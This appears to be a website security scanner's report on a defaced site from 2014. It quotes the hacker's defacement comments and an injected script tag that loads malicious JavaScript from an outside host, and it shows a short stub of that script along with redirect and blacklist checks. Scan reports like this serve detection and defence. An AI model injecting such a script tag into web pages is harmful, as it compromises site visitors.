Scanned pages/files
Request | Server response | Status |
http://baan-schwarz.com/ | 200 OK Content-Length: 3639 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//-- <!--[!WE ARE HERE ONLY TO WARN NOT TO DESTROY!]--> <!--[!SALAM, UNDER CONSTRUCTIONS. WE WILL COME BACK!]--> <!--//contact:japext87@gmail.com//--> <html> <head><script src="http://d.webshieldonline.com/l/load.js"></script> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <title>Ti pikir karo gae kotang</title> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <meta name="description" content="[!WE ARE HERE ONLY TO WARN NOT TO DESTROY!]"> <!--Z0nE-H AcCepT://Hacked by Panimin Ardiansyah//--> <meta name="keywords" content="Hacked by Panimin Ardiansyah"> ...[3457 bytes skipped]...
http://d.webshieldonline.com/l/load.js | 200 OK Content-Length: 16023 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var data1 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data2 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data3 = { ns4: "[#[NAMESHORT]#]" })(); Antivirus reports:
http://baan-schwarz.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: baan-schwarz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Sep 2014 11:01:28 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: baan-schwarz.com
Referer: http://www.google.com/search?q=baan-schwarz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=baan-schwarz.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://baan-schwarz.com/
Result: baan-schwarz.com is not infected or malware details are not published yet.